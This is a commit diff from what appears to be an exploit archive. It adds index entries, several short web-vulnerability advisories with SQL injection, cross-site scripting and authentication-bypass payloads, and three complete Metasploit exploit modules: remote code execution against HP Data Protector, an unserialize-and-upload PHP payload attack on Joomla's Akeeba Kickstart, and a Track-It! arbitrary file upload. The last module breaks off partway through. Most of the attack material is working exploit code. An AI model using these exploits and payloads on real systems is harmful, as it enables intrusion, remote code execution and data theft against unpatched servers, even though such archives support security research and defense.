Updated 10_23_2014
This commit is contained in:
parent
a7cf4f066c
commit
6cd4fbf74e
11 changed files with 1137 additions and 0 deletions
10
files.csv
10
files.csv
|
@ -31538,3 +31538,13 @@ id,file,description,date,author,platform,type,port
|
|||
35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0
|
||||
35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0
|
||||
35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0
|
||||
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0
|
||||
35025,platforms/php/webapps/35025.html,"Car Portal 2.0 'car_make' Parameter Cross Site Scripting Vulnerability",2010-11-29,"Underground Stockholm",php,webapps,0
|
||||
35026,platforms/php/webapps/35026.txt,"Joomla Store Directory 'id' Parameter SQL Injection Vulnerability",2010-11-30,XroGuE,php,webapps,0
|
||||
35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 Admin Login Multiple SQL Injection Vulnerabilities",2010-11-26,ali_err0r,php,webapps,0
|
||||
35028,platforms/php/webapps/35028.txt,"SmartBox 'page_id' Parameter SQL Injection Vulnerability",2010-11-26,KnocKout,php,webapps,0
|
||||
35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-11-30,BugTracker.NET,asp,webapps,0
|
||||
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,metasploit,windows,remote,0
|
||||
35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,metasploit,php,remote,80
|
||||
35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,metasploit,multiple,remote,5555
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/asp/webapps/35031.txt
Executable file
9
platforms/asp/webapps/35031.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45121/info
|
||||
|
||||
BugTracker.NET is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
BugTracker.NET v3.4.4 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E
|
354
platforms/multiple/remote/35034.rb
Executable file
354
platforms/multiple/remote/35034.rb
Executable file
|
@ -0,0 +1,354 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'HP Data Protector EXEC_INTEGUTIL Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists
|
||||
in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL
|
||||
request allows to execute arbitrary commands from a restricted directory. Since it
|
||||
includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute
|
||||
arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but
|
||||
an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP
|
||||
Data Protector for linux. This module has been tested successfully on HP Data Protector
|
||||
9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # vulnerability discovery
|
||||
'juan vazquez' # msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'ZDI', '14-344']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
# The powershell embedded payload takes some time to deploy
|
||||
'WfsDelay' => 20
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Linux 64 bits / HP Data Protector 9',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'perl gawk bash-tcp openssl python generic'
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
[ 'Windows 64 bits / HP Data Protector 9',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'powershell'
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Oct 2 2014'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5555)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
fingerprint = get_fingerprint
|
||||
|
||||
if fingerprint.nil?
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if fingerprint =~ /Data Protector A\.(\d+\.\d+)/
|
||||
version = $1
|
||||
vprint_status("#{peer} - Windows / HP Data Protector version #{version} found")
|
||||
elsif fingerprint =~ / INET/
|
||||
vprint_status("#{peer} - Linux / HP Data Protector found")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
if Gem::Version.new(version) <= Gem::Version.new('9')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Detected # there is no patch at the time of module writing
|
||||
end
|
||||
|
||||
def exploit
|
||||
rand_exec = rand_text_alpha(8)
|
||||
print_status("#{peer} - Leaking the HP Data Protector directory...")
|
||||
leak = leak_hp_directory(rand_exec)
|
||||
dir = parse_dir(leak, rand_exec)
|
||||
|
||||
if dir.nil?
|
||||
dir = default_hp_dir
|
||||
print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}")
|
||||
else
|
||||
unless valid_target?(dir)
|
||||
print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
|
||||
end
|
||||
end
|
||||
|
||||
if target.name =~ /Windows/
|
||||
#command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
|
||||
print_status("#{peer} - Executing payload...")
|
||||
execute_windows(payload.encoded, dir)
|
||||
else
|
||||
print_status("#{peer} - Executing payload...")
|
||||
execute_linux(payload.encoded, dir)
|
||||
end
|
||||
end
|
||||
|
||||
def peer
|
||||
"#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def build_pkt(fields)
|
||||
data = "\xff\xfe" # BOM Unicode
|
||||
fields.each do |v|
|
||||
data << "#{Rex::Text.to_unicode(v)}\x00\x00"
|
||||
data << Rex::Text.to_unicode(" ") # Separator
|
||||
end
|
||||
|
||||
data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
|
||||
return [data.length].pack("N") + data
|
||||
end
|
||||
|
||||
def get_fingerprint
|
||||
fingerprint = get_fingerprint_windows
|
||||
if fingerprint.nil?
|
||||
fingerprint = get_fingerprint_linux
|
||||
end
|
||||
|
||||
fingerprint
|
||||
end
|
||||
|
||||
def get_fingerprint_linux
|
||||
connect
|
||||
|
||||
sock.put([2].pack("N") + "\xff\xfe")
|
||||
begin
|
||||
res = sock.get_once(4)
|
||||
rescue EOFError
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
disconnect
|
||||
return nil
|
||||
else
|
||||
length = res.unpack("N")[0]
|
||||
end
|
||||
|
||||
begin
|
||||
res = sock.get_once(length)
|
||||
rescue EOFError
|
||||
return nil
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
return nil
|
||||
end
|
||||
|
||||
res
|
||||
end
|
||||
|
||||
def get_fingerprint_windows
|
||||
connect
|
||||
|
||||
sock.put(rand_text_alpha_upper(64))
|
||||
begin
|
||||
res = sock.get_once(4)
|
||||
rescue ::Errno::ECONNRESET, EOFError
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
disconnect
|
||||
return nil
|
||||
else
|
||||
length = res.unpack("N")[0]
|
||||
end
|
||||
|
||||
begin
|
||||
res = sock.get_once(length)
|
||||
rescue EOFError
|
||||
return nil
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
return nil
|
||||
end
|
||||
|
||||
Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
|
||||
end
|
||||
|
||||
def leak_hp_directory(rand_exec)
|
||||
connect
|
||||
pkt = build_pkt([
|
||||
"2", # Message Type
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
"28", # Opcode EXEC_INTEGUTIL
|
||||
rand_exec,
|
||||
])
|
||||
|
||||
sock.put(pkt)
|
||||
begin
|
||||
res = sock.get_once(4)
|
||||
rescue EOFError
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
disconnect
|
||||
return nil
|
||||
else
|
||||
length = res.unpack("N")[0]
|
||||
end
|
||||
|
||||
begin
|
||||
res = sock.get_once(length)
|
||||
rescue EOFError
|
||||
return nil
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
return nil
|
||||
end
|
||||
|
||||
if res =~ /No such file or directory/ # Linux signature
|
||||
return res
|
||||
else # deal as windows target
|
||||
return Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
|
||||
end
|
||||
end
|
||||
|
||||
def parse_dir(data, clue)
|
||||
if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/
|
||||
dir = $1
|
||||
print_good("#{peer} - HP Data Protector directory found on #{dir}")
|
||||
elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/
|
||||
dir = $1
|
||||
print_good("#{peer} - HP Data Protector directory found on #{dir}")
|
||||
else
|
||||
dir = nil
|
||||
end
|
||||
|
||||
dir
|
||||
end
|
||||
|
||||
def valid_target?(dir)
|
||||
if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\/
|
||||
return true
|
||||
elsif target.name =~ /Linux/ && dir.start_with?('/')
|
||||
return true
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def default_hp_dir
|
||||
if target.name =~ /Windows/
|
||||
dir = 'C:\\Program Files\\OmniBack\\'
|
||||
else # linux
|
||||
dir = '/opt/omni/lbin/'
|
||||
end
|
||||
|
||||
dir
|
||||
end
|
||||
|
||||
def execute_windows(cmd, hp_dir)
|
||||
connect
|
||||
pkt = build_pkt([
|
||||
"2", # Message Type
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
"28", # Opcode EXEC_INTEGUTIL
|
||||
"perl.exe",
|
||||
"-I#{hp_dir}lib\\perl",
|
||||
"-MMIME::Base64",
|
||||
"-e",
|
||||
"system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
|
||||
])
|
||||
sock.put(pkt)
|
||||
disconnect
|
||||
end
|
||||
|
||||
def execute_linux(cmd, hp_dir)
|
||||
connect
|
||||
pkt = build_pkt([
|
||||
'2', # Message Type
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
'11', # Opcode EXEC_BAR
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
rand_text_alpha(8),
|
||||
"../bin/perl",
|
||||
rand_text_alpha(8),
|
||||
"-I#{hp_dir}lib/perl",
|
||||
'-MMIME::Base64',
|
||||
'-e',
|
||||
"system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
|
||||
])
|
||||
sock.put(pkt)
|
||||
disconnect
|
||||
end
|
||||
end
|
149
platforms/php/remote/35033.rb
Executable file
149
platforms/php/remote/35033.rb
Executable file
|
@ -0,0 +1,149 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/zip'
|
||||
require 'json'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier
|
||||
3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba
|
||||
component, which is responsible for Joomla! updates. Nevertheless it is worth to note
|
||||
that this vulnerability is only exploitable during the update of the Joomla! CMS.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Johannes Dahse', # Vulnerability discovery
|
||||
'us3r777 <us3r777[at]n0b0.so>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-7228' ],
|
||||
[ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
|
||||
[ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
|
||||
[ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
|
||||
],
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
|
||||
],
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 29 2014",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
|
||||
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def primer
|
||||
srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"
|
||||
|
||||
php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
|
||||
php_filename = rand_text_alpha(8 + rand(8)) + '.php'
|
||||
|
||||
# Create the zip archive
|
||||
print_status("Creating archive with file #{php_filename}")
|
||||
zip_file = Rex::Zip::Archive.new
|
||||
zip_file.add_file(php_filename, payload.encoded)
|
||||
@zip = zip_file.pack
|
||||
|
||||
# First step: call restore to run _prepare() and get an initialized AKFactory
|
||||
print_status("#{peer} - Sending PHP serialized object...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
|
||||
'vars_get' => {
|
||||
'task' => 'stepRestore',
|
||||
'factory' => Rex::Text.encode_base64(php_serialized_akfactory)
|
||||
}
|
||||
})
|
||||
|
||||
unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
|
||||
print_status("#{res.code}\n#{res.body}")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unexpected response")
|
||||
end
|
||||
|
||||
# Second step: modify the currentPartNumber within the returned serialized AKFactory
|
||||
json = /###(.*)###/.match(res.body)[1]
|
||||
begin
|
||||
b64encoded_prepared_factory = JSON.parse(json)['factory']
|
||||
rescue JSON::ParserError
|
||||
fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")
|
||||
end
|
||||
|
||||
prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
|
||||
modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
|
||||
|
||||
print_status("#{peer} - Sending initialized and modified AKFactory...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
|
||||
'vars_get' => {
|
||||
'task' => 'stepRestore',
|
||||
'factory' => Rex::Text.encode_base64(modified_factory)
|
||||
}
|
||||
})
|
||||
|
||||
unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
|
||||
fail_with(Failure::Unknown, "#{peer} - Unexpected response")
|
||||
end
|
||||
|
||||
register_files_for_cleanup(php_filename)
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
|
||||
}, 2)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# When the server stops due to our timeout, this is raised
|
||||
end
|
||||
end
|
||||
|
||||
# Handle incoming requests from the server
|
||||
def on_request_uri(cli, request)
|
||||
if @zip && request.uri =~ /\.zip$/
|
||||
print_status("Sending the ZIP archive...")
|
||||
send_response(cli, @zip, { 'Content-Type' => 'application/zip' })
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Sending not found...")
|
||||
send_not_found(cli)
|
||||
end
|
||||
|
||||
end
|
9
platforms/php/webapps/35023.txt
Executable file
9
platforms/php/webapps/35023.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45084/info
|
||||
|
||||
Wernhart Guestbook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Wernhart Guestbook 2001.03.28 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/guestbook/insert.phtml?LastName=' union select 1,2,3,4,5,6/*
|
9
platforms/php/webapps/35024.txt
Executable file
9
platforms/php/webapps/35024.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45090/info
|
||||
|
||||
The Joomla! Catalogue Component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
|
||||
|
||||
http://www.example.com/index.php?option=com_catalogue&Itemid=73&cat_id=[SQLi]
|
||||
|
||||
http://www.example.com/index.php?option=com_catalogue&controller=[LFI]
|
32
platforms/php/webapps/35025.html
Executable file
32
platforms/php/webapps/35025.html
Executable file
|
@ -0,0 +1,32 @@
|
|||
source: http://www.securityfocus.com/bid/45092/info
|
||||
|
||||
Car Portal is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Car Portal 2.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
<!--
|
||||
TITLE: Car Portal v2.0 "car_make" Cross-Site Scripting Vulnerability
|
||||
PRODUCT: Car Portal v2.0
|
||||
PRODUCT URL: http://www.netartmedia.net/carsportal/
|
||||
RESEARCHERS: underground-stockholm.com
|
||||
RESEARCHERS URL: http://underground-stockholm.com/
|
||||
-->
|
||||
<html>
|
||||
<body>
|
||||
<form method="post" action="http://[host]/[path]/index.php">
|
||||
<input type="hidden" name="ProceedSearch" value="1">
|
||||
<input type="hidden" name="mod" value="cars_search">
|
||||
<input type="hidden" name="lang" value="en">
|
||||
<input type="hidden" name="Step" value="1">
|
||||
<input type="hidden" name="car_make" value="<script>alert(1337)</script>">
|
||||
<input type="hidden" name="car_model" value="All">
|
||||
<input type="hidden" name="car_year_from" value="1983">
|
||||
<input type="hidden" name="car_year_to" value="1987">
|
||||
<input type="hidden" name="zip" value="">
|
||||
<input type="hidden" name="order_by" value="price">
|
||||
<input type="submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
7
platforms/php/webapps/35026.txt
Executable file
7
platforms/php/webapps/35026.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45094/info
|
||||
|
||||
Joomla! Store Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_storedirectory&task=view&id=[SQLi]
|
12
platforms/php/webapps/35027.txt
Executable file
12
platforms/php/webapps/35027.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/45098/info
|
||||
|
||||
E-lokaler CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
E-lokaler CMS 2 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example inputs are available:
|
||||
|
||||
Username: ' or 1=1-- -
|
||||
Password: ' or 1=1-- -
|
8
platforms/php/webapps/35028.txt
Executable file
8
platforms/php/webapps/35028.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/45101/info
|
||||
|
||||
SmartBox is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/page.php?page_id=14%20and%20substring%28@@version,1,1%29=5
|
538
platforms/windows/remote/35032.rb
Executable file
538
platforms/windows/remote/35032.rb
Executable file
|
@ -0,0 +1,538 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Numara / BMC Track-It! FileStorageService Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!
|
||||
v8 to v11.X.
|
||||
The application exposes the FileStorageService .NET remoting service on port 9010
|
||||
(9004 for version 8) which accepts unauthenticated uploads. This can be abused by
|
||||
a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary
|
||||
code execution as NETWORK SERVICE or SYSTEM.
|
||||
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
|
||||
10.0.0.143, 9.0.30.248 and 8.0.2.51.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # vulnerability discovery and MSF module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-4872' ],
|
||||
[ 'OSVDB', '112741' ],
|
||||
[ 'US-CERT-VU', '121036' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ]
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 30 },
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Numara / BMC Track-It! v9 to v11.X - Windows', {} ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Oct 7 2014'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('RPORT',
|
||||
[true, 'TrackItWeb application port', 80]),
|
||||
OptPort.new('RPORT_REMOTING',
|
||||
[true, '.NET remoting service port', 9010]),
|
||||
OptInt.new('SLEEP',
|
||||
[true, 'Seconds to sleep while we wait for ASP(X) file to be written', 15]),
|
||||
OptString.new('TARGETURI',
|
||||
[true, 'Base path to the TrackItWeb application', '/TrackItWeb/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def get_version
|
||||
res = send_request_cgi!({
|
||||
'uri' => normalize_uri(datastore['TARGETURI']),
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res and res.code == 200 and res.body.to_s =~ /\/TrackItWeb\/Content\.([0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,4})\//
|
||||
version = $1.split(".")
|
||||
return version
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
version = get_version
|
||||
if version != nil
|
||||
if (version[0].to_i < 11) or
|
||||
(version[0].to_i == 11 and version[1].to_i <= 3) or
|
||||
(version[0].to_i == 11 and version[1].to_i == 3 and version[2].to_i == 0 and version[3].to_i < 999)
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
|
||||
if not sock.nil?
|
||||
sock.write(rand_text_alpha(rand(200) + 100))
|
||||
res = sock.recv(1024)
|
||||
if res =~ /Tcp channel protocol violation: expecting preamble/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
sock.close
|
||||
end
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
||||
def longest_common_substr(strings)
|
||||
shortest = strings.min_by &:length
|
||||
maxlen = shortest.length
|
||||
maxlen.downto(0) do |len|
|
||||
0.upto(maxlen - len) do |start|
|
||||
substr = shortest[start,len]
|
||||
return substr if strings.all?{|str| str.include? substr }
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def get_traversal_path
|
||||
#
|
||||
# ConfigurationService packet structure:
|
||||
#
|
||||
# @packet_header_pre_packet_size
|
||||
# packet_size (4 bytes)
|
||||
# @packet_header_pre_uri_size
|
||||
# uri_size (2 bytes)
|
||||
# @packet_header_pre_uri
|
||||
# uri
|
||||
# @packet_header_post_uri
|
||||
# packet_body_start_pre_method_size
|
||||
# method_size (1 byte)
|
||||
# method
|
||||
# @packet_body_pre_type_size
|
||||
# type_size (1 byte)
|
||||
# @packet_body_pre_type
|
||||
# type
|
||||
# @packet_terminator
|
||||
#
|
||||
# .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx
|
||||
#
|
||||
packet_body_start_pre_method_size = [
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x15, 0x11, 0x00, 0x00, 0x00, 0x12
|
||||
]
|
||||
|
||||
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
|
||||
method = "GetProductDeploymentValues".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
|
||||
